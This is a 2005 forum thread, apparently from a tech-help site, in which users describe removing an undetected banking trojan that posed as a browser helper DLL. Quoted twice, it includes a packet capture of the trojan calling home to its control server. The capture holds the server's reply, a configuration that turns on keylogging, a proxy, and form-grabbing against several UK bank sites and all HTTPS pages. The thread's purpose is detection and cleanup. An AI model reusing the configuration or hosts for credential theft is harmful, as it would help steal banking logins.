grom_home
07-10-2005, 03:10 AM
-rehn- Wrote:
> I have manually removed a malware from my system.
> It was opening a lot of ports.
> And every time it opend a new port
> it was "calling home" to 83.149.82.168
>
> I can provide a full Ethereal dump
> and the 3 "bad" files I found
> if anybody is interested.
>
> I have sent an email the isp's abuse.
>
> This is what Ethereal extracted:
>
> POST /cgi-bin/ref.cgi?Sun%20Apr%2017%2016%3A58%3A13.593%202005 HTTP/1.0
> Host: nugget-sales.com
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 108
> Accept: */*
> Accept-Language: en
> Accept-Encoding: gzip, deflate
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
> Connection: close
>
> i=2246824488&v=2805&os=WinNT5.1-2600&s=&h=&d=0&b=0&u=210&k=37103&m=37103&panic=0&c=United
> Kingdom&l=ENG&mo=0
> HTTP/1.1 200 OK
> Date: Mon, 18 Apr 2005 04:00:09 GMT
> Server: Apache/2.0.40 (Red Hat Linux)
> Content-Length: 671
> Connection: close
> Content-Type: text/html; charset=ISO-8859-1
>
> http +'www.microsoft.com' (http://www.microsoft.com/) +Ba "Mozilla/4.0
> (compatible\; MSIE 6.0\;
> Windows NT 5.1)"
> rmold
> socks 0.0.0.0:65535
> httpp +0.0.0.0:65535
> log +everything +Smz 1 9;setwnd 8 * * * +wclCME 60 1;timer
> -qewrqrewq;timer +qewrqrewq -R+AIc 10000000 "setwnd 8 * * * -E"
> setwnd 0 *halifax-online.co.uk* * * +urfKPMWS 4096 2 200000
> setwnd 1 *.lloydsts
> b.co.uk* * * +urfKPMWS 4096 2 200000
> setwnd 2 *.nwolb.com* * * +urfKPMWS 4096 2 200000
> setwnd 3 *.hsbc.co.uk* * * +urfKPMWS 4096 2 200000
> setwnd 4 *.barclays.co.uk* * * +urfKPMWS 4096 2 200000
> setwnd 17 'https://*' (https://*/) * * +urfKPBMW 4096 1000 2
> setwnd 18 * 'https://*' (https://*/) * +urfKPBMW 4096 1000 2
> setwnd 19 * * * +urfKP*MW 4096 2
> http #hosts +I 60000
Hi, I found this baby on four PC's/servers in our network.
took the same aproach you did but found nothing.
Then I ran "hijackthis" and did a scan.
I located a strange BHO (Browser Helper Object" pointing to a dll in
\windows\system32. It had a different name on all machines but always
looked like a MS file . I did not have a version info tab in the
prperties though. It was about 71Kb and accompanied by a .dat file with
the same name.
I tried to deleted but it was in use so I used a tool wich can do that
at startup. When the file was gone so was the traffic to
nugget-sales.com. It was not detected by any antivirus or antispyware
engine so I reported it to virus@ca.com. They have now analyzed it and
confirmed it to be malware.
good luck,
Ruud
--
grom_home
------------------------------------------------------------------------
grom_home's Profile: http://www.iamnotageek.com/member.php?userid=13147
View this thread: http://www.iamnotageek.com/showthread.php?t=1819062359
> I have manually removed a malware from my system.
> It was opening a lot of ports.
> And every time it opend a new port
> it was "calling home" to 83.149.82.168
>
> I can provide a full Ethereal dump
> and the 3 "bad" files I found
> if anybody is interested.
>
> I have sent an email the isp's abuse.
>
> This is what Ethereal extracted:
>
> POST /cgi-bin/ref.cgi?Sun%20Apr%2017%2016%3A58%3A13.593%202005 HTTP/1.0
> Host: nugget-sales.com
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 108
> Accept: */*
> Accept-Language: en
> Accept-Encoding: gzip, deflate
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
> Connection: close
>
> i=2246824488&v=2805&os=WinNT5.1-2600&s=&h=&d=0&b=0&u=210&k=37103&m=37103&panic=0&c=United
> Kingdom&l=ENG&mo=0
> HTTP/1.1 200 OK
> Date: Mon, 18 Apr 2005 04:00:09 GMT
> Server: Apache/2.0.40 (Red Hat Linux)
> Content-Length: 671
> Connection: close
> Content-Type: text/html; charset=ISO-8859-1
>
> http +'www.microsoft.com' (http://www.microsoft.com/) +Ba "Mozilla/4.0
> (compatible\; MSIE 6.0\;
> Windows NT 5.1)"
> rmold
> socks 0.0.0.0:65535
> httpp +0.0.0.0:65535
> log +everything +Smz 1 9;setwnd 8 * * * +wclCME 60 1;timer
> -qewrqrewq;timer +qewrqrewq -R+AIc 10000000 "setwnd 8 * * * -E"
> setwnd 0 *halifax-online.co.uk* * * +urfKPMWS 4096 2 200000
> setwnd 1 *.lloydsts
> b.co.uk* * * +urfKPMWS 4096 2 200000
> setwnd 2 *.nwolb.com* * * +urfKPMWS 4096 2 200000
> setwnd 3 *.hsbc.co.uk* * * +urfKPMWS 4096 2 200000
> setwnd 4 *.barclays.co.uk* * * +urfKPMWS 4096 2 200000
> setwnd 17 'https://*' (https://*/) * * +urfKPBMW 4096 1000 2
> setwnd 18 * 'https://*' (https://*/) * +urfKPBMW 4096 1000 2
> setwnd 19 * * * +urfKP*MW 4096 2
> http #hosts +I 60000
Hi, I found this baby on four PC's/servers in our network.
took the same aproach you did but found nothing.
Then I ran "hijackthis" and did a scan.
I located a strange BHO (Browser Helper Object" pointing to a dll in
\windows\system32. It had a different name on all machines but always
looked like a MS file . I did not have a version info tab in the
prperties though. It was about 71Kb and accompanied by a .dat file with
the same name.
I tried to deleted but it was in use so I used a tool wich can do that
at startup. When the file was gone so was the traffic to
nugget-sales.com. It was not detected by any antivirus or antispyware
engine so I reported it to virus@ca.com. They have now analyzed it and
confirmed it to be malware.
good luck,
Ruud
--
grom_home
------------------------------------------------------------------------
grom_home's Profile: http://www.iamnotageek.com/member.php?userid=13147
View this thread: http://www.iamnotageek.com/showthread.php?t=1819062359